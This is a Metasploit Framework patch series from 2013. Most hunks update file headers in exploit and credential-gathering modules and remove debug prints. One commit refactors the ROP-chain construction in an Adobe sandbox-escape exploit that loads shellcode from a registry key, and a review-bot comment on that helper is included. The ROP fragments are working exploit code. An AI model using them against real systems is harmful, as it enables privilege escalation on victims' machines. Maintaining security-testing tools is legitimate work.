b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb 
@@ -1,6 +1,4 @@ -## -# $Id: novelliprint_getdriversettings.rb$ -## +# -*- coding: binary -*- ### # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index e0715c8038..f91f26f1e1 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 745e30410b..2129a721a6 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -1,6 +1,4 @@ -## -# $Id: enum_imvu.rb 14100 2011-10-28 18:00:10Z theLightCosine $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index f9bf10b3e3..38c25e3895 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -1,4 +1,4 @@ -# $Id: outlook.rb 14835 2012-03-01 22:15:05Z rapid7 $ +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index f4e761de39..36722018f0 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -1,6 +1,4 @@ -## -# $Id $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to From 53cb493bc96a6a0b5b086ddc6b8244178fcfb6d6 Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 Date: Mon, 20 May 2013 18:44:21 -0500 Subject: [PATCH 4/6] Fix @jlee-r7's feedback --- .../local/adobe_sandbox_adobecollabsync.rb | 41 ++++++++----------- 1 file changed, 18 insertions(+), 23 deletions(-) diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index de33098531..50a7c3ad46 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -185,6 +185,19 @@ class Metasploit3 < Msf::Exploit::Local vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}") end + def store(buf, data, address) + i = 0 + while (i < data.length) + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [address + i].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << data[i, 4].ljust(4,"\x00") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + i = i + 4 + end + return i + end + def create_rop_chain mem = 0x0c0c0c0c 
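Review bot: The new `store` helper has no comment, and its return value is easy to misread: `i` advances in steps of 4, so it returns the length of `data` rounded up to a multiple of 4, not `data.length`. The caller in the next hunk keeps that value as `reg_key_length` and uses it as the offset for the following string, so the padding is part of the contract. A header comment such as `# Appends to buf the writes that place data at address, 4 bytes per step; returns the byte count rounded up to a multiple of 4.` and a name like `reg_key_size` would make this explicit. `return i` can also be a bare `i` as the last expression. Separately, the context line above the helper labels the address as 'pop edi # ret' while interpolating `@gadgets['pop ecx # ret']`, so the verbose message reports the wrong gadget; that function starts outside the hunk.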
@@ -210,31 +223,13 @@ class Metasploit3 < Msf::Exploit::Local # Put in the allocated memory the necessary data in order to read the # shellcode stored in the registry - # The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions - # The reg entry: shellcode - # The output buffer size: 0x3000 + # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00" - j = 0 - while (j < reg_key.length) - buf << [@gadgets['pop edi # ret']].pack("V") - buf << [mem + j].pack("V") # edi - buf << [@gadgets['pop ecx # ret']].pack("V") - buf << reg_key[j, 4].ljust(4,"\x00") # ecx - buf << [@gadgets['mov [edi], ecx # ret']].pack("V") - j = j + 4 - end - k = j + reg_key_length = store(buf, reg_key, mem) + # 2) The reg entry: shellcode value_key = "shellcode\x00" - j = 0 - while (j < value_key.length) - buf << [@gadgets['pop edi # ret']].pack("V") - buf << [mem + k + j].pack("V") # edi - buf << [@gadgets['pop ecx # ret']].pack("V") - buf << value_key[j, 4].ljust(4,"\x00") # ecx - buf << [@gadgets['mov [edi], ecx # ret']].pack("V") - j = j + 4 - end - + store(buf, value_key, mem + reg_key_length) + # 3) The output buffer size: 0x3000 size_buffer = 0x3000 buf << [@gadgets['pop edi # ret']].pack("V") buf << [mem + 0x50].pack("V") # edi From 1cf485fad13ff735bb44dc5f9c22dc32e592f58e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 22 May 2013 12:06:36 -0500 Subject: [PATCH 5/6] Restore tcp.rb to its current state --- lib/msf/core/exploit/tcp.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index a34f195744..5a923427ec 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb 
@@ -468,8 +468,6 @@ module Exploit::Remote::TcpServer # def regenerate_payload(cli, arch = nil, platform = nil, target = nil) - $stderr.puts("Tcp##{__method__} : target: #{target.inspect}") - ohost = datastore['RHOST'] oport = datastore['RPORT'] p = nil @@ -479,7 +477,7 @@ module Exploit::Remote::TcpServer datastore['RHOST'] = cli.peerhost datastore['RPORT'] = cli.peerport - if ((p = super(platform, arch, target)) == nil) + if ((p = super(arch, platform, target)) == nil) print_error("Failed to generate payload") return nil end From 8483528ae0273bd8c2c2480d2b37ce1b2251464c Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 22 May 2013 12:11:06 -0500 Subject: [PATCH 6/6] Restore generic.rb to the correct state --- lib/msf/core/payload/generic.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb index 4691c7ed59..c72cf13bf0 100644 --- a/lib/msf/core/payload/generic.rb +++ b/lib/msf/core/payload/generic.rb @@ -211,13 +211,10 @@ protected arch = nil if explicit_arch.nil? == false - $stderr.puts "explicit" arch = explicit_arch elsif datastore['ARCH'] - $stderr.puts "datastore" arch = datastore['ARCH'] elsif assoc_exploit - $stderr.puts "assoc_exploit" arch = assoc_exploit.target_arch || ARCH_X86 end @@ -236,8 +233,6 @@ protected # Look for one based on the exploit's compatible set if(assoc_exploit) - $stderr.puts "assoc_exploit #{assoc_exploit.name}" - $stderr.puts "#{actual_arch} #{actual_platform.inspect}" self.actual_payload = framework.payloads.find_payload_from_set( assoc_exploit.compatible_payloads, actual_platform,